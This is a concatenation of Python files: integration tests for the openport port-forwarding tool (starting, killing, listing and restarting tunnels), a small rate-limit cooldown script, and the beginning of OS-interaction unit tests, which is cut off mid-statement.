config_location = os.path.expanduser('~/.openport/openport.cfg')
config.read(config_location)
config.set(section, option, value)
with open(config_location, 'w') as f:
config.write(f)
# def test_manager__other_tcp_app_on_port(self):
# manager_port = self.osinteraction.get_open_port()
# self.manager_port = manager_port
# s = SimpleTcpServer(manager_port)
# s.runThreaded()
#
# print 'manager_port :', manager_port
# self.write_to_conf_file('manager', 'port', manager_port)
#
# p_manager2 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', 'manager', '--database', self.db_file,
# '--verbose'],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_manager2)
# sleep(2)
# command_output = print_all_output(p_manager2, self.osinteraction, 'p_manager2')
#
# self.assertNotEqual(False, command_output[0])
# self.assertTrue('Manager is now running on port' in command_output[0])
# self.assertTrue(self.application_is_alive(p_manager2))
#
# s.close()
#
# def test_manager__other_tcp_app_on_port__pass_by_argument(self):
# manager_port = self.osinteraction.get_open_port()
# self.manager_port = manager_port
# s = SimpleTcpServer(manager_port)
# s.runThreaded()
#
# print 'manager_port :', manager_port
#
# p_manager2 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', 'manager', '--database', self.db_file,
# '--verbose', '--manager-port', str(manager_port)],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_manager2)
# sleep(2)
# command_output = print_all_output(p_manager2, self.osinteraction, 'p_manager2')
#
# self.assertNotEqual(False, command_output[0])
# self.assertTrue('Manager is now running on port' in command_output[0])
# self.assertTrue(self.application_is_alive(p_manager2))
#
# s.close()
#
# def test_manager__other_http_app_on_port(self):
# manager_port = self.osinteraction.get_open_port()
# self.manager_port = manager_port
# s = TestHTTPServer(manager_port)
# s.reply('hello')
# s.runThreaded()
#
# print 'manager_port :', manager_port
# self.write_to_conf_file('manager', 'port', manager_port)
#
# p_manager2 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', 'manager', '--database', self.db_file,
# '--verbose'],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_manager2)
# sleep(2)
# command_output = print_all_output(p_manager2, self.osinteraction, 'p_manager2')
#
# self.assertNotEqual(False, command_output[0])
# self.assertTrue('Manager is now running on port' in command_output[0])
# self.assertTrue(self.application_is_alive(p_manager2))
#
# s.stop()
def getRemoteAddress(self, output):
print ('getRemoteAddress - output:%s' % output)
import re
m = re.search(r'Now forwarding remote address ([a-z\\.]*) to localhost', output)
if m is None:
raise Exception('address not found in output: %s' % output)
return m.group(1)
# def test_openport_app_start_manager(self):
# manager_port = self.osinteraction.get_open_port()
# self.manager_port = manager_port
# print 'manager port: ', manager_port
# self.assertFalse(openportmanager.manager_is_running(manager_port))
#
# port = self.osinteraction.get_open_port()
# print 'local port: ', port
#
# p_app = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
# '--verbose', '--server', TEST_SERVER, '--manager-port', str(manager_port),
# '--database', self.db_file, '--restart-on-reboot'],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_app)
#
# remote_host, remote_port, link = get_remote_host_and_port(p_app, self.osinteraction, output_prefix='app')
# print lineNumber(), "remote port:", remote_port
# click_open_for_ip_link(link)
#
# self.check_application_is_still_alive(p_app)
#
# self.assertTrue(openportmanager.manager_is_running(manager_port))
#
# os.kill(p_app.pid, KILL_SIGNAL)
# run_method_with_timeout(p_app.wait, 10)
# sleep(1)
# self.assertTrue(openportmanager.manager_is_running(manager_port))
# self.kill_manager(manager_port)
# sleep(5)
# self.assertFalse(openportmanager.manager_is_running(manager_port))
def test_openport_app__cannot_reach_manager(self):
port = self.osinteraction.get_open_port()
print ('local port: ', port)
p_app = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port,
'--verbose', '--server', TEST_SERVER,
'--listener-port', str(700000), # port out of reach
'--database', self.db_file, '--restart-on-reboot'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app)
remote_host, remote_port, link = get_remote_host_and_port(p_app, self.osinteraction, output_prefix='app')
click_open_for_ip_link(link)
self.check_application_is_still_alive(p_app)
print (lineNumber(), "remote port:", remote_port)
def test_kill(self):
port = self.osinteraction.get_open_port()
print ('local port: ', port)
p_app = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port,
'--verbose', '--server', TEST_SERVER,
'--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# Todo: there still is a problem if the app gets the signal before the tunnel is set up.
remote_host, remote_port, link = get_remote_host_and_port(p_app, self.osinteraction, output_prefix='p_app')
self.osinteraction.print_output_continuously_threaded(p_app, 'p_app')
self.processes_to_kill.append(p_app)
p_kill = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--kill', str(port),
'--database', self.db_file, '--verbose'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_kill)
self.osinteraction.print_output_continuously_threaded(p_kill, 'p_kill')
run_method_with_timeout(p_kill.wait, 10)
run_method_with_timeout(p_app.wait, 10)
self.assertFalse(self.application_is_alive(p_app))
def test_kill_all(self):
port = self.osinteraction.get_open_port()
print ('local port: ', port)
self.assertEqual(0, get_nr_of_shares_in_db_file(self.db_file))
p_app1 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port,
'--verbose', '--server', TEST_SERVER,
'--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app1)
get_remote_host_and_port(p_app1, self.osinteraction)
self.osinteraction.print_output_continuously_threaded(p_app1, 'p_app1')
self.assertEqual(1, get_nr_of_shares_in_db_file(self.db_file))
port2 = self.osinteraction.get_open_port()
print ('local port2: ', port2)
self.assertNotEqual(port, port2)
p_app2 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port2,
'--verbose', '--server', TEST_SERVER,
'--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app2)
get_remote_host_and_port(p_app2, self.osinteraction)
for share in self.db_handler.get_active_shares():
logger.debug(share.local_port)
self.assertEqual(2, get_nr_of_shares_in_db_file(self.db_file))
p_kill = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--kill-all',
'--database', self.db_file, '--restart-on-reboot'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.osinteraction.print_output_continuously_threaded(p_kill, 'p_kill')
sleep(3)
self.processes_to_kill.append(p_kill)
run_method_with_timeout(p_kill.wait, 10)
sleep(3)
self.assertFalse(p_app1.poll() is None)
self.assertFalse(p_app2.poll() is None)
# def test_restart_manager_on_different_port(self):
# manager_port = self.osinteraction.get_open_port()
# print 'manager port: ', manager_port
# self.manager_port = manager_port
# self.assertFalse(openportmanager.manager_is_running(manager_port))
#
# port = self.osinteraction.get_open_port()
# print 'local port: ', port
#
# p_app = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
# '--verbose', '--server', TEST_SERVER, '--manager-port', str(manager_port),
# '--database', self.db_file, '--restart-on-reboot'],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_app)
#
# remote_host, remote_port, link = get_remote_host_and_port(p_app, self.osinteraction, output_prefix='app')
# print lineNumber(), "remote port:", remote_port
# click_open_for_ip_link(link)
#
# self.check_application_is_still_alive(p_app)
# sleep(3)
# self.assertTrue(openportmanager.manager_is_running(manager_port))
# self.assertEqual(1, self.get_share_count_of_manager(manager_port))
#
# self.kill_manager(manager_port)
# kill_all_processes(self.processes_to_kill)
# i = 0
# while self.osinteraction.pid_is_running(p_app.pid) and i < 30:
# sleep(1)
# self.assertFalse(self.osinteraction.pid_is_running(p_app.pid), 'could not kill the app.')
#
# new_manager_port = self.osinteraction.get_open_port()
# print 'new manager port:', new_manager_port
# self.assertNotEqual(manager_port, new_manager_port)
#
# p_manager2 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', 'manager', '--database', self.db_file,
# '--verbose', '--manager-port', str(new_manager_port),
# '--server', TEST_SERVER, '--restart-shares'],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_manager2)
# self.manager_port = new_manager_port
#
# sleep(15)
# print_all_output(p_manager2, self.osinteraction, 'p_manager2')
#
# self.assertEqual(1, self.get_share_count_of_manager(new_manager_port))
#
# print "http://%s:%s" % (remote_host, remote_port)
# failed = False
# e = None
# try:
# self.check_http_port_forward(remote_host=remote_host, local_port=port, remote_port=remote_port)
# except Exception as e:
# failed = True
# sleep(5)
#
# print_all_output(p_manager2, self.osinteraction, 'p_manager2 - final')
# if failed:
# raise e
#
# self.kill_manager(new_manager_port)
# sleep(5)
# print_all_output(p_manager2, self.osinteraction, 'p_manager2 - killed')
# def test_manager_kills_restarted_openport_processes(self):
# """ Test to see that the manager kills the jobs it has restarted.
# """
#
# # Starting the manager
# manager_port = self.osinteraction.get_open_port()
# print 'manager port: ', manager_port
# self.manager_port = manager_port
# self.assertFalse(openportmanager.manager_is_running(manager_port))
#
# p_manager = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', 'manager', '--database', self.db_file,
# '--verbose', '--manager-port', str(manager_port), '--server', TEST_SERVER],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_manager)
#
# sleep(1)
# print_all_output(p_manager, self.osinteraction, 'p_manager')
#
# self.assertTrue(openportmanager.manager_is_running(manager_port))
#
# # Starting http server
#
# port = self.osinteraction.get_open_port()
# print 'local port: ', port
#
# s = TestHTTPServer(port)
# s.reply('echo')
# s.runThreaded()
#
# # Starting openport session
#
# p_app = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
# '--verbose', '--server', TEST_SERVER, '--manager-port', str(manager_port),
# '--http-forward', '--database', self.db_file, '--restart-on-reboot'],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_app)
# print "p_app pid:", p_app.pid
# sleep(10)
#
# # Checking that everything is still running.
#
# print_all_output(p_manager, self.osinteraction, 'p_manager')
#
# self.assertEqual(1, self.get_share_count_of_manager(manager_port))
# process_output = print_all_output(p_app, self.osinteraction, 'p_app')
#
# remote_host = self.getRemoteAddress(process_output[0])
# sleep(10)
#
# # Checking the connection.
#
# cr = SimpleHTTPClient()
# try:
# url = 'http://' + remote_host
# print 'url=' + url
# self.assertEqual('echo', cr.get(url))
# except Exception as e:
# tr = traceback.format_exc()
# logger.error(e)
# logger.error(tr)
# self.fail('first port forwarding failed')
#
# # Killing the manager
#
# if not osinteraction.is_windows():
# self.osinteraction.kill_pid(p_manager.pid, signal.SIGINT)
# else:
# self.kill_manager(manager_port)
# sleep(3)
# print_all_output(p_manager, self.osinteraction, 'p_manager')
#
# self.assertFalse(openportmanager.manager_is_running(manager_port))
#
# # Checking that the connection is down.
#
# try:
# self.assertEqual('echo', cr.get(url, print500=False))
# self.fail('expecting an exception')
# except AssertionError:
# raise
# except:
# pass
#
# if not osinteraction.is_windows():
# run_method_with_timeout(p_app.communicate, 2, raise_exception=False)
#
# self.assertFalse(self.osinteraction.pid_is_running(p_app.pid))
#
# # Restarting manager, should restart port-forwarding app
#
# p_manager = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', 'manager', '--database', self.db_file,
# '--verbose', '--manager-port', str(manager_port), '--server', TEST_SERVER,
# '--restart-shares'],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_manager)
#
# sleep(25)
# process_output = print_all_output(p_manager, self.osinteraction, 'p_manager')
#
# self.assertTrue(openportmanager.manager_is_running(manager_port))
# self.assertEqual(1, self.get_share_count_of_manager(manager_port))
#
# # Checking that http server is still running
#
# local_url = 'http://127.0.0.1:%s' % port
# try:
# self.assertEqual('echo', cr.get(local_url))
# except Exception as e:
# logger.exception(e)
# self.fail('calling local port failed')
#
# print "url2: %s" % url
# wait_for_success_callback(p_manager, self.osinteraction, output_prefix='p_manager')
#
# # Checking that the openport session has restarted.
#
# try:
# self.assertEqual('echo', cr.get(url, print500=False))
# except Exception as e:
# logger.exception(e)
# self.fail('second port forwarding failed')
#
# # Killing the manager should also kill the app
#
# if not osinteraction.is_windows():
# self.osinteraction.kill_pid(p_manager.pid, signal.SIGINT)
# else:
# self.kill_manager(manager_port)
#
# sleep(3)
#
# print_all_output(p_manager, self.osinteraction, 'p_manager')
#
# self.assertFalse(openportmanager.manager_is_running(manager_port))
#
# # Checking that the openport session has ended.
#
# try:
# self.assertEqual('echo', cr.get(url, print500=False))
# self.fail('expecting an exception')
# except:
# pass
def check_http_port_forward(self, remote_host, local_port, remote_port=80):
s = TestHTTPServer(local_port)
response = 'echo'
s.reply(response)
s.runThreaded()
c = SimpleHTTPClient()
actual_response = c.get('http://localhost:%s' % local_port)
self.assertEqual(actual_response, response.strip())
url = 'http://%s:%s' % (remote_host, remote_port) if remote_port != 80 else 'http://%s' % remote_host
print('checking url:{}'.format(url))
try:
actual_response = c.get(url)
except urllib2.URLError as e:
self.fail('Http forward failed')
self.assertEqual(actual_response, response.strip())
print('http portforward ok')
s.server.shutdown()
def kill_manager(self, manager_port):
url = 'http://localhost:%s/exit' % manager_port
logger.debug('sending get request ' + url)
try:
req = urllib2.Request(url)
response = urllib2.urlopen(req, timeout=1).read()
if response.strip() != 'ok':
print (lineNumber(), response)
else:
print ('manager killed')
except Exception as detail:
print (detail)
def get_share_count_of_manager(self, manager_port):
url = 'http://localhost:%s/active_count' % manager_port
logger.debug('sending get request ' + url)
try:
req = urllib2.Request(url)
response = urllib2.urlopen(req, timeout=1).read()
return int(response)
except Exception as detail:
print ('error contacting the manager: %s %s' % (url, detail))
raise
def test_kill_openport_app(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--verbose', '--local-port', '%s' % port,
'--server', TEST_SERVER,
'--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
sleep(2)
get_remote_host_and_port(p, self.osinteraction)
print('pid: %s' % p.pid)
self.osinteraction.kill_pid(p.pid, signal.SIGTERM)
run_method_with_timeout(p.wait, 10)
output = self.osinteraction.get_output(p)
print(output[0])
print(output[1])
# Sadly, this does not work on windows...
if not osinteraction.is_windows():
self.assertTrue('got signal ' in output[0])
self.assertFalse(self.osinteraction.pid_is_running(p.pid))
def test_remote_kill_stops_application(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
session = self.db_handler.get_share_by_local_port(port)
data = {'port': session.server_port, 'session_token': session.server_session_token, }
print(data)
r = requests.post('{}/api/v1/kill-session'.format(TEST_SERVER),
data)
logger.debug('#########{}'.format(r.text))
self.assertEqual(200, r.status_code, r.text)
self.osinteraction.print_output_continuously_threaded(p, 'p')
run_method_with_timeout(p.wait, 30)
self.assertFalse(self.osinteraction.pid_is_running(p.pid))
def test_version(self):
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--version'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
run_method_with_timeout(p.wait, 10)
process_output = p.communicate()
for out in process_output:
print ('output: ', out)
self.assertFalse(self.application_is_alive(p))
self.assertEqual(openport_app_version.VERSION, process_output[1].strip())
def test_run_run_command_with_timeout(self):
self.assertEqual((False, False),
run_command_with_timeout([PYTHON_EXE, '-c', 'from time import sleep;sleep(1)'], 2))
self.assertEqual((False, False),
run_command_with_timeout([PYTHON_EXE, '-c', 'from time import sleep;sleep(2)'], 1))
self.assertEqual(('hello', False), run_command_with_timeout([PYTHON_EXE, '-c', "print 'hello'"], 1))
self.assertEqual(('hello', False), run_command_with_timeout([PYTHON_EXE, '-c', 'from time import sleep;import sys'
";print 'hello';sys.stdout.flush()"
';sleep(2)'], 1))
def test_shell_behaviour(self):
p = subprocess.Popen('''%s -c "print 'hello'"''' % PYTHON_EXE, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertEqual(('hello', False), self.osinteraction.get_output(p))
p = subprocess.Popen([PYTHON_EXE, '-c', 'print "hello"'], shell=False, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertEqual(('hello', False), self.osinteraction.get_output(p))
def test_open_for_ip_option__False(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--verbose', '--local-port', '%s' % port,
'--server', TEST_SERVER,
'--database', self.db_file, '--ip-link-protection', 'False'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
self.check_application_is_still_alive(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
check_tcp_port_forward(self, remote_host, port, remote_port)
def test_open_for_ip_option__True(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--verbose', '--local-port', '%s' % port,
'--server', TEST_SERVER,
'--database', self.db_file, '--ip-link-protection', 'True'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
self.check_application_is_still_alive(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.assertFalse(check_tcp_port_forward(self, remote_host, port, remote_port, fail_on_error=False))
click_open_for_ip_link(link)
check_tcp_port_forward(self, remote_host, port, remote_port)
def test_alembic__0_9_1__new_share(self):
old_db = os.path.join(os.path.dirname(__file__), 'testfiles/openport-0.9.1.db')
old_db_tmp = os.path.join(os.path.dirname(__file__), 'testfiles/tmp/openport-0.9.1.db')
shutil.copy(old_db, old_db_tmp)
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', old_db_tmp],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
click_open_for_ip_link(link)
db_handler = dbhandler.DBHandler(old_db_tmp)
session_from_db = db_handler.get_share_by_local_port(port)
self.assertNotEqual(session_from_db, None)
check_tcp_port_forward(self, remote_host=remote_host, local_port=port, remote_port=remote_port)
def test_alembic__0_9_1__restart_shares(self):
pass
def test_alembic__create_migrations(self):
return
old_db = os.path.join(os.path.dirname(__file__), 'testfiles/openport-0.9.1.db')
old_db_tmp = os.path.join(os.path.dirname(__file__), 'testfiles/tmp/openport-0.9.1.db')
shutil.copy(old_db, old_db_tmp)
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--create-migrations', '--verbose', '--database', old_db_tmp],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
run_method_with_timeout(p.wait, 10)
process_output = print_all_output(p, self.osinteraction, 'list')
print (process_output[0])
self.assertFalse(process_output[1])
def test_openport_app__no_errors(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
get_remote_host_and_port(p, self.osinteraction)
output = print_all_output(p, self.osinteraction)
self.assertFalse(output[1])
# self.assertFalse('UserWarning' in output[1])
p.kill()
def test_openport_app__restart_on_reboot_app_not_running(self):
port = self.osinteraction.get_open_port()
# This app should be restarted
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--restart-on-reboot', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
get_remote_host_and_port(p, self.osinteraction)
p.kill()
# This app shouldn't be restarted
q = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(q)
remote_host, remote_port, link = get_remote_host_and_port(q, self.osinteraction)
output = self.osinteraction.get_all_output(q)
self.assertTrue('Port forward for port %s that would be restarted on reboot will not be restarted anymore.' % port in output[0])
def test_hang(self):
sleep_and_print = '''from time import sleep
for i in range(%s):
print i
sleep(1)
print 'Now forwarding remote port test.openport.be:12345 to localhost:555'
print 'to first go here: http://1235.be .'
print 'INFO - You are now connected. You can access the remote pc\\\'s port 7777 on localhost:8888'
for i in range(%s):
print i
sleep(1)
'''
port_out = self.osinteraction.get_open_port()
if 1 == 1:
p_out = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port_out, # --verbose,
'--server', TEST_SERVER, '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
else:
p_out = subprocess.Popen([PYTHON_EXE, '-c', sleep_and_print % (3, 60)],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug('p_out.pid: %s' % p_out.pid)
self.processes_to_kill.append(p_out)
remote_host, remote_port, link = get_remote_host_and_port(p_out, self.osinteraction)
# click_open_for_ip_link(link)
self.osinteraction.print_output_continuously_threaded(p_out, 'p_out')
sleep(1)
logger.debug(self.osinteraction.get_output(p_out))
if 1 == 1:
if 1 == 1:
p_in = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py',
'--server', TEST_SERVER, '--database', self.db_file, '--forward-tunnel', '--verbose',
'--remote-port', str(remote_port), '--restart-on-reboot'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
host, port_in, link = get_remote_host_and_port(p_in, self.osinteraction, forward_tunnel=True)
else:
port_out = self.osinteraction.get_open_port()
p_in = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port_out, # --verbose,
'--server', TEST_SERVER, '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
host, port_in, link = get_remote_host_and_port(p_in, self.osinteraction)
else:
p_in = subprocess.Popen([PYTHON_EXE, '-c', sleep_and_print % (3, 60)],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
host, port_in, link = get_remote_host_and_port(p_in, self.osinteraction, forward_tunnel=True)
logger.debug('p_in.pid: %s' % p_in.pid)
self.processes_to_kill.append(p_in)
self.check_application_is_still_alive(p_in)
self.check_application_is_still_alive(p_out)
sleep(1)
logger.debug(self.osinteraction.get_output(p_in))
# sleep(2)
# in_session = self.db_handler.get_share_by_local_port(port_in, filter_active=False)
# check_tcp_port_forward(self, remote_host='127.0.0.1', local_port=port_out, remote_port=port_in)
p_in.terminate()
logger.debug('p_in wait')
run_method_with_timeout(p_in.wait, 10)
logger.debug('p_in wait done')
if 1 == 1:
p_restart = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--restart-shares', '--verbose',
'--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
else:
p_restart = subprocess.Popen([PYTHON_EXE, '-c', sleep_and_print % (1, 3)],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug('p_restart started')
self.processes_to_kill.append(p_restart)
logger.debug('p_restart continuous print')
self.osinteraction.print_output_continuously_threaded(p_restart, 'p_restart')
logger.debug('p_restart.wait')
#run_method_with_timeout(p_restart.wait, 10)
# p_restart.communicate()
logger.debug('p_restart.pid: %s' % p_restart.pid)
run_method_with_timeout(p_restart.wait, 10)
# p_restart.wait()
logger.debug('p_restart.wait done')
self.check_application_is_still_alive(p_out)
logger.debug('alive!')
# check_tcp_port_forward(self, remote_host=remote_host, local_port=port_out, remote_port=remote_port)
def foo():
return False
logger.debug('wait for response')
# wait_for_response(foo, timeout=5)
logger.debug('sleeping now')
sleep(1)
#sleep(20)
logger.debug('wait_for_response done')
# check_tcp_port_forward(self, remote_host='127.0.0.1', local_port=port_out, remote_port=port_in)
def test_list(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
session = self.db_handler.get_share_by_local_port(port)
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--list', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
p.wait()
output = p.communicate()
for i in output:
print (i)
self.assertTrue(session.open_port_for_ip_link in output[0])
if __name__ == '__main__':
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='test-reports'))
|
withdraw.py
|
import queue
import threading
import time
rateLimit = []
rateLimitQueue = queue.Queue()
def cooldown_add(user, cooldown_amount=86400):
rateLimitQueue.put((user, time.time()+cooldown_amount))
rateLimit.append(user)
def deleteLimit():
while True:
if rateLimitQueue.empty == True:
time.sleep(1)
else:
latest = rateLimitQueue.get()
current = round(time.time())
expires = latest[1]
if current >= expires:
rateLimit.pop(0)
continue
else:
time.sleep(expires-current)
rateLimit.pop(0)
rateLimitThread = threading.Thread(target=deleteLimit)
rateLimitThread.start()
|
os_interaction_tests.py
|
__author__ = 'jan'
import os
import sys
import logging
import threading
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import unittest
import xmlrunner
from services.osinteraction import OsInteraction, getInstance, is_windows
import subprocess
from time import sleep
from services.logger_service import set_log_level
from test_utils import run_command_with_timeout, run_command_with_timeout_return_process
from services.utils import run_method_with_timeout
from common.share import Share
from mock import Mock, call
import pyperclip
class OsInteractionTest(unittest.TestCase):
def setUp(self):
print self._testMethodName
self.os_interaction = getInstance()
set_log_level(logging.DEBUG)
def test_set_variable(self):
args = ['python', 'openport.py', '--one', '--two', '--three', '3']
self.assertEqual(['python', 'openport.py', '--one', '--two'], OsInteraction.unset_variable(args, '--three'))
self.assertEqual(['python', 'openport.py', '--one', '--three', '3'], OsInteraction.unset_variable(args, '--two'))
self.assertEqual(['python', 'openport.py', '--one', '--two', '--three', '3', '--four', '4'],
OsInteraction.set_variable(args, '--four', '4'))
self.assertEqual(['python', 'openport.py', '--one', '--two', '--three', '3', '--four'],
OsInteraction.set_variable(args, '--four'))
self.assertEqual(['python', 'openport.py', '--one', '--two', '--three', '3', '--four', 'False'],
OsInteraction.set_variable(args, '--four', False))
self.assertEqual(args, OsInteraction.unset_variable(args, '--not-there'))
def test_get_variable(self):
self.assertEqual('jan', OsInteraction.get_variable(['sudo', '-u', 'jan', 'ls', 'test'], '-u'))
self.assertEqual(None, OsInteraction.get_variable(['ls', 'test'], '-u'))
self.assertEqual('jan', OsInteraction.get_variable(['sudo', '-u', 'jan', 'ls', '-u', 'test'], '-u'))
self.assertEqual('jan', OsInteraction.get_variable(['sudo', '-u', 'jan'], '-u'))
self.assertEqual(None, OsInteraction.get_variable(['ls', '-u'], '-u'))
def test_non_block_read(self):
# The flush is needed for the tests.
# See http://stackoverflow.com/questions/6257800/incremental-output-with-subprocess-pipe
p = subprocess.Popen(['python', '-c', "from time import sleep;import sys; print 'aaa'; sys.stdout.flush(); "
"sleep(1); print 'bbb'"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
bufsize=1, close_fds=not is_windows())
sleep(0.1)
self.assertEqual(('aaa', False), self.os_interaction.non_block_read(p))
sleep(2)
self.assertEqual(('bbb', False), self.os_interaction.non_block_read(p))
#todo: close_fds = ON_POSIX ?
self.assertEqual(('aaa%sbbb' % os.linesep, False), self.os_interaction.get_all_output(p))
def test_non_block_read__no_output(self):
# The flush is needed for the tests.
# See http://stackoverflow.com/questions/6257800/incremental-output-with-subprocess-pipe
p = subprocess.Popen(['python', '-c', "from time import sleep;import sys; "
"sleep(1); print 'bbb'"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
bufsize=1, close_fds=not is_windows())
sleep(0.1)
self.assertEqual((False, False), self.os_interaction.non_block_read(p))
self.assertEqual((False, False), self.os_interaction.get_all_output(p))
sleep(2)
self.assertEqual(('bbb', False), self.os_interaction.non_block_read(p))
self.assertEqual(('bbb', False), self.os_interaction.get_all_output(p))
def test_run_command_and_print_output_continuously(self):
os.chdir(os.path.dirname(os.path.dirname(__file__)))
command = self.os_interaction.get_python_exec()
print command
command.extend(['-c', "from time import sleep;import sys; print 'aaa'; sys.stdout.flush(); "
"sleep(1); print 'bbb'"])
output, p = self.os_interaction.run_command_and_print_output_continuously(command)
self.assertEqual(['aaa%sbbb' % os.linesep, False], output)
def test_run_command_and_print_output_continuously__kill_app(self):
os.chdir(os.path.dirname(os.path.dirname(__file__)))
command = self.os_interaction.get_python_exec()
print command
command.extend(['-c', "from time import sleep;import sys; print 'aaa'; sys.stdout.flush(); "
"sleep(5); print 'bbb'"])
s = run_command_with_timeout_return_process(command, 1)
sleep(1.5)
output = self.os_interaction.print_output_continuously(s)
self.assertEqual(['aaa', False], output)
def test_get_output__kill_app(self):
os.chdir(os.path.dirname(os.path.dirname(__file__)))
command = self.os_interaction.get_python_exec()
print command
command.extend(['-c', "from time import sleep;import sys; print 'aaa'; sys.stdout.flush(); "
